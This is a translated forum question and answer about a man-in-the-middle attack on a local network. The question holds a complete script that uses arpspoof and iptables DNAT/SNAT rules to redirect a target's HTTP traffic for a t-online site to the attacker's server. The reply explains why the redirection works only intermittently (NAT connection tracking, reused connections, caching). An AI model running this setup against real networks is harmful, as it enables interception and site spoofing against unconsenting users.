iptables有时不能像我认为的那样工作

我正在尝试对本地网络进行中间人攻击，并尝试用自己的服务器替换navigationshilfe1.t-online.de服务器。稍后，我想替换自定义服务而不是http服务。我当前的脚本如下：

sysctl -w net.ipv4.ip_forward=1

export TARGET=192.168.2.104
export ATTACKER=192.168.2.115
export GATEWAY=192.168.2.1
export SITE=62.138.238.45 #  navigationshilfe1.t-online.de

iptables -t nat -F

iptables -t nat -A PREROUTING -p tcp --destination-port 80 -d $SITE -j DNAT --to-destination $ATTACKER:80
iptables -t nat -A POSTROUTING -p tcp -s $ATTACKER --source-port 80 -j SNAT --to-source $SITE:80

iptables -t nat -L -n -v

arpspoof -i eth0 -c both -t $TARGET -r $GATEWAY

问题在于，有时目标的Web浏览器会显示真实站点，如果我刷新页面几次，它会显示伪造的页面，反之亦然。有人知道为什么还是连接不好吗？

有一些可能性

请注意，iptables nat规则仅适用于连接的第一个数据包。建立连接后，将使用内部映射表。

浏览器重复使用连接以节省连接设置开销。因此，如果您的浏览器仍然具有从添加之前开始的开放连接，则对这些连接的规则请求将不会被转移。

另一种可能性是您正在浏览器中看到缓存的影响。浏览器通常会执行“条件获取”，只有在时间戳指示自客户端上次下载以来，页面已更改时，才重新下载该页面。